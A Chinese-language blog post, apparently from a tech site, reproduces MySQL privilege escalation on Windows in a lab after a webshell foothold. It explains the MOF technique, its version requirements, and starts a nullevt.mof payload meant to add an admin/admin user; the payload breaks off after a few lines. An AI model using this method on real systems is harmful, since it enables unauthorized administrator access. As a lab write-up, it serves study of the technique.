mysql提权之MOF、UDF复现

今天复现了一下mysql提权,以往都没有尝试过,所以搭建环境尝试一下。

搭建环境:
phpstudy
win7企业版
DVWA上传点

以上步骤省略,跳到getshell后,使用哥斯拉进行提权。(假设所有条件满足,如不满足,尝试其他方法)

一、MOF提权
原理:
利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。

注:mysql5.7 开始默认使用 secure-file-priv 选项,不能随意选择导出路径。如有需要,需将my.ini里添加一行"secure-file-priv=".

提权要求:
1、低于win2008版本.
2、数据库为 mysql<5.7且知道登录账号密码并且允许外连.

1、先用select version();查看版本,低于5.7可尝试提权

2、将如下代码保存文件nullevt.mof,添加用户admin/admin(可改用户,代码下admin admin)。上传到可读可写文件夹。

#pragma namespace("\\.\root\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = "Select * From __InstanceModificationEvent "

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值